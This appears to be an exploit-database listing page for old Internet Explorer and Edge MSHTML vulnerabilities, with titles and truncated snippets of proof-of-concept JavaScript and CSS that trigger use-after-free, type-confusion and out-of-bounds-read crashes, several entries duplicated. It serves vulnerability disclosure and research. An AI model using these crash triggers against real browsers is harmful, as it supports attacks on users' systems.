Microsoft Internet Explorer - textarea.defaultValue Memory Disclosure (MS17-006) Exploit
Exploit for windows platform in category dos / poc function run() { var textarea = document.getElementById("textarea"); var frame = document.createElement("iframe"); textarea.appendChild(frame); frame.contentDocument.onreadystatechange = eventhandler; form.reset(); } function eventhandler...
Microsoft Edge / Internet Explorer HandleColumnBreakOnColumnSpanningElement Type Confusion Exploit
Microsoft Edge and Internet Explorer suffer from a type confusion in HandleColumnBreakOnColumnSpanningElement. Microsoft Edge and IE: Type confusion in HandleColumnBreakOnColumnSpanningElement CVE-2017-0037 PoC: .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table...
Microsoft Internet Explorer 11 - MSHTML CPasteCommand::ConvertBitmaptoPng Heap Buffer Overflow (MS14-056)
Microsoft Internet Explorer 11 - MSHTML CPasteCommand::ConvertBitmaptoPng Heap Buffer Overflow MS14-056 Security Settings - Choose a zone - Scripting should prevent websites from programmatically copy/pasting an image. Disabling execution of scripts on web-pages altogether will have the same...
Microsoft Internet Explorer 11 - MSHTML CPasteCommand::ConvertBitmaptoPng Heap Buffer Overflow (MS14-056)
Security Settings - Choose a zone - Scripting should prevent websites from programmatically copy/pasting an image. Disabling execution of scripts on web-pages altogether will have the same effect. Please note that neither option prevents a website from social engineering the user into typing a...
Microsoft Internet Explorer 11 MSHTML - CSpliceTreeEngine::RemoveSplice Use-After-Free (MS14-035)
Exploit for windows platform in category dos / poc document.addEventListener("DOMNodeRemoved", function() { document.open(); // free // attempt to modify freed memory here // because it will be reused after th...
Microsoft Internet Explorer 9 MSHTML - CMarkup::ReloadInCompatView Use-After-Free Exploit
Exploit for windows platform in category dos / poc document.designMode = "on"; <!-- Details By switching a document's designMode property to on in a deferred script, MSIE 9 can be made to reload a web page using CMarkup::ReloadInCompatView. This method calls CDoc::CompatViewRefresh, whi...
Microsoft Internet Explorer 9 - MSHTML CMarkup::ReloadInCompatView Use-After-Free
Microsoft Internet Explorer 9 - MSHTML CMarkup::ReloadInCompatView Use-After-Free document.designMode = "on"; <!-- Details By switching a document's designMode property to on in a deferred script, MSIE 9 can be made to reload a web page using CMarkup::ReloadInCompatView. This method...
Microsoft Internet Explorer 9 - MSHTML CMarkup::ReloadInCompatView Use-After-Free
document.designMode = "on"; <!-- Details By switching a document's designMode property to on in a deferred script, MSIE 9 can be made to reload a web page using CMarkup::ReloadInCompatView. This method calls CDoc::CompatViewRefresh, which indirectly calls...
Microsoft Internet Explorer 9 MSHTML - CElement::HasFlag Memory Corruption Exploit
Exploit for windows platform in category dos / poc // First tag can be any inline but must NOT be closed yet // Second tag can be anything that's not inline. // "text1" can be anything document.write('text1'); // The tree is in good shape. show("DOM Tree after first write",...
Microsoft Internet Explorer 9 MSHTML - CDispNode::InsertSiblingNode Use-After-Free (MS13-037) (1)
Exploit for windows platform in category dos / poc window.onload=function(){location.reload();}; text .float { float:left; } .zoom { zoom:3000%; } .border::first-let...
Microsoft Internet Explorer 9 - MSHTML CDispNode::InsertSiblingNode Use-After-Free (MS13-037) (1)
Microsoft Internet Explorer 9 - MSHTML CDispNode::InsertSiblingNode Use-After-Free MS13-037 1 window.onload=function(){location.reload();}; text .float { float:left; } .zoom { zoom:3000%; } .border::first-letter...
Microsoft Internet Explorer MSHTML CDispNode::InsertSiblingNode Use-After-Free
Since November I have been releasing details on all vulnerabilities I found that I have not released before. This is the twenty-seventh entry in the series. This information is available in more detail on my blog at http://blog.skylined.nl/20161207001.html. There you can find a repro that trigger...
Microsoft Internet Explorer 9 MSHTML CDispNode::InsertSiblingNode Use-After-Free
Since November I have been releasing details on all vulnerabilities I found that I have not released before. This is the twenty-eighth entry in the series. This information is available in more detail on my blog at http://blog.skylined.nl/20161208001.html. There you can find a repro that triggere...
Microsoft Internet Explorer 8 MSHTML - SRunPointer::SpanQualifier/RunType Out-Of-Bounds Read (MS1
Exploit for windows platform in category dos / poc positionfixed { position: fixed; } positionrelative { position: relative; } floatleft { float: left; } complex { float: left; width: 100%; } complex:first-line { clear: left; } window.onload = function boom() { oElementfloatleft =...
Microsoft Internet Explorer 10 MSHTML - CEditAdorner::Detach Use-After-Free (MS13-047) Exploit
Exploit for windows platform in category dos / poc var oWindow = window.open("window.xhtml"); setInterval(function() { try { oWindow.eval("(" + function() { document.designMode = "on"; document.execCommand("SelectAll"); var oSelection = window.getSelection(); oSelection.collapse(document,1);...
Microsoft Internet Explorer 8 / 9 / 10 / 11 MSHTML - DOMImplementation Type Confusion Exploit
Exploit for windows platform in category dos / poc Source: http://blog.skylined.nl/20161128001.html Synopsis A specially crafted web-page can cause a type confusion vulnerability in Microsoft Internet Explorer 8 through to 11. An attacker can cause code to be executed with a stack layout it does...
Microsoft Internet Explorer 8 - MSHTML SRunPointer::SpanQualifierRunType Out-Of-Bounds Read (MS15-009)
Microsoft Internet Explorer 8 - MSHTML SRunPointer::SpanQualifierRunType Out-Of-Bounds Read MS15-009 positionfixed { position: fixed; } positionrelative { position: relative; } floatleft { float: left; } complex { float: left; width: 100%; } complex:first-line { clear: left; } window.onload = function boom...
Microsoft Internet Explorer 10 - MSHTML 'CEditAdorner::Detach' Use-After-Free (MS13-047)
var oWindow = window.open("window.xhtml"); setInterval(function() { try { oWindow.eval("(" + function() { document.designMode = "on"; document.execCommand("SelectAll"); var oSelection = window.getSelection(); oSelection.collapse(document,1); document.execCommand("InsertImage", false);...
Microsoft Internet Explorer 8 - MSHTML 'SRunPointer::SpanQualifier/RunType' Out-Of-Bounds Read (MS15-009)
positionfixed { position: fixed; } positionrelative { position: relative; } floatleft { float: left; } complex { float: left; width: 100%; } complex:first-line { clear: left; } window.onload = function boom() { oElementfloatleft = document.createElement('floatleft'); oElementcomplex =...
Microsoft Internet Explorer 10 MSHTML CEditAdorner::Detach Use-After-Free
Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the nineteenth entry in that series. Unfortunately I won't be able to publish everything within one month at the current rate, so I may continue to publish these throu...